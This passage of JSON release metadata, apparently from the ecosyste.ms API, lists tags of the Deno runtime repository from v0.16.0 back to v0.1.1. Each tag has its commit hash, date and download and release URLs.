deno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2